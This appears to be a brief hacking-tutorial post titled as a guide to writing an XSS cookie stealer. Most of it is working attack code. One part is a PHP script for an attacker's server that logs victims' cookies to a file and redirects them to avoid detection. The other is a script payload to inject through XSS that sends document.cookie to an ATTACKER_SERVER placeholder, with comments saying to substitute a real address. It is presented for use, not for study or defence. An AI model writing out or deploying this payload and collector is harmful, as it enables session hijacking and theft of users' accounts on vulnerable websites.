How Write an XSS Cookie Stealer in JavaScript to Steal Passwords ~ MrLeet

Title: How Write an XSS Cookie Stealer in JavaScript to Steal PasswordsAuthor: unknowndevice64

// Upload/Save this file on ATTACKER_SERVER cookiestealer.php //
// change this google.com to same website, which you are attacking, so that Victim can't detect. //
// you can find cookie into same directory where you put this file, name log.txt //

<?php
header ('Location:https://google.com');

$cookies = $_GET["c"];
$file = fopen('log.txt', 'a');
fwrite($file, $cookies . "\n\n");
?>

// Payload to inject into XSS //
// replace ATTACKER_SERVER by real URL or IP //

<script type="text/javascript">
document.location='http://ATTACKER_SERVER/cookiestealer.php?c='+document.cookie;
</script>

Dislike

Submitted On: 2019-11-08 22:57:46